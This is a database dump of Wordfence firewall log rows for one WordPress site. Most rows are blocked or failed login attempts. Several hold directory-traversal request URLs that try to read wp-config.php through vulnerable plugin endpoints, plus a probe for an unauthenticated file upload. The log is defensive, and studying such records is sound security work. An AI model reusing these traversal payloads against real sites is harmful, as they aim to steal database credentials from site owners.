(5349, 1596380306.304573, 1596380306.162500, 0x00000000000000000000ffff5e17d8a7, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5350, 0.000000, 1596388349.685472, 0x00000000000000000000ffffb955eef4, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5351, 0.000000, 1596412174.671891, 0x00000000000000000000ffffb956a46b, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5352, 0.000000, 1596424679.214882, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5353, 0.000000, 1596425216.053480, 0x00000000000000000000ffffc39a3e27, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5354, 0.000000, 1596449786.123125, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5355, 0.000000, 1596461357.410097, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5356, 1596466114.201014, 1596466114.094900, 0x00000000000000000000ffff34e650de, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5357, 0.000000, 1596467309.561943, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5358, 0.000000, 1596471047.241529, 0x00000000000000000000ffff505240d4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cubscouts.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5359, 0.000000, 1596476632.034389, 0x00000000000000000000ffffa3accfe0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cubscouts.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5360, 0.000000, 1596479564.547200, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5361, 0.000000, 1596480799.874003, 0x00000000000000000000ffffa3accfe0, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cubscouts.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5362, 0.000000, 1596480805.443122, 0x00000000000000000000ffffa3accfe0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cubscouts.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5363, 0.000000, 1596486048.163287, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5364, 0.000000, 1596488410.296625, 0x00000000000000000000ffffdff1047b, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://dokodem.net/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5365, 0.000000, 1596496939.921787, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5366, 0.000000, 1596506982.839305, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5367, 0.000000, 1596512419.875574, 0x00000000000000000000ffff0ea2ee10, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://autonomousmusic.org/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'loginFailInvalidUsername', NULL, NULL),
(5368, 0.000000, 1596538023.178816, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5369, 0.000000, 1596539184.419572, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5370, 1596556290.811079, 1596556290.771900, 0x00000000000000000000ffffbc527433, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Chrome', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5371, 1596556290.352837, 1596556290.300000, 0x00000000000000000000ffffbc527433, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Findex.php', NULL, 'Chrome', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5372, 0.000000, 1596557963.945435, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5373, 0.000000, 1596565481.596082, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5374, 0.000000, 1596579964.205044, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5375, 0.000000, 1596588103.751358, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5376, 0.000000, 1596595541.803002, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5377, 1596600667.803718, 1596600667.780900, 0x00000000000000000000ffffbca5c574, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5378, 1596600667.312742, 1596600667.166500, 0x00000000000000000000ffffbca5c574, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5379, 0.000000, 1596604309.933745, 0x00000000000000000000ffffb956a467, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5380, 0.000000, 1596610420.087114, 0x00000000000000000000ffffd2387722, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.ilkeskitchen.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(5381, 0.000000, 1596614249.925934, 0x00000000000000000000ffffb956a46c, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5382, 0.000000, 1596622553.999242, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5383, 0.000000, 1596646697.018304, 0x00000000000000000000ffffb956a46c, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5384, 0.000000, 1596664731.726007, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5385, 0.000000, 1596672658.269538, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5386, 0.000000, 1596690663.233816, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5387, 0.000000, 1596702581.076561, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5388, 0.000000, 1596712251.508370, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5389, 0.000000, 1596721223.125155, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5390, 0.000000, 1596730037.878840, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5391, 0.000000, 1596739497.262825, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5392, 0.000000, 1596746450.916419, 0x00000000000000000000ffffb9dc65c4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5393, 0.000000, 1596747051.544360, 0x00000000000000000000ffffb9dc66f8, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5394, 0.000000, 1596760482.926186, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5395, 0.000000, 1596772034.548520, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5396, 0.000000, 1596783288.418678, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5397, 0.000000, 1596789990.166018, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5398, 0.000000, 1596798417.416287, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5399, 0.000000, 1596810393.585127, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5400, 0.000000, 1596816193.371796, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5401, 0.000000, 1596823684.326968, 0x00000000000000000000ffff2f6a801a, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.sked.de/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'loginFailInvalidUsername', NULL, NULL),
(5402, 0.000000, 1596827580.828335, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5403, 0.000000, 1596831938.348604, 0x00000000000000000000ffffb9dc64fd, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5404, 1596837042.046189, 1596837041.950500, 0x00000000000000000000ffff5b7996e5, 0, 403, 1, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5405, 0.000000, 1596837130.626437, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5406, 0.000000, 1596837762.888259, 0x00000000000000000000ffffc61b4582, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5407, 0.000000, 1596843753.909517, 0x00000000000000000000ffff57629b7b, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(5408, 0.000000, 1596848689.848637, 0x00000000000000000000ffffb956a463, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5409, 1596865841.543476, 1596865841.492700, 0x00000000000000000000ffffc0c8d75b, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36', 'blocked:waf', 'N-Media Post Front-end Form <= 1.0 - Unauthenticated Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"69\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9vbW5pLXNlY3VyZS1maWxlcy9wbHVwbG9hZC9leGFtcGxlcy91cGxvYWQucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(5410, 0.000000, 1596880912.401326, 0x00000000000000000000ffff452e2414, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(5411, 0.000000, 1596895725.705825, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5412, 0.000000, 1596896518.859910, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5413, 1596906802.946524, 1596906802.796500, 0x00000000000000000000ffff5e17d8a7, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tocmVmXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90aW55bWNlLXRodW1ibmFpbC1nYWxsZXJ5L3BocC9kb3dubG9hZC1pbWFnZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5414, 0.000000, 1596913709.970992, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5415, 0.000000, 1596915628.031160, 0x00000000000000000000ffffc1a9fc25, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
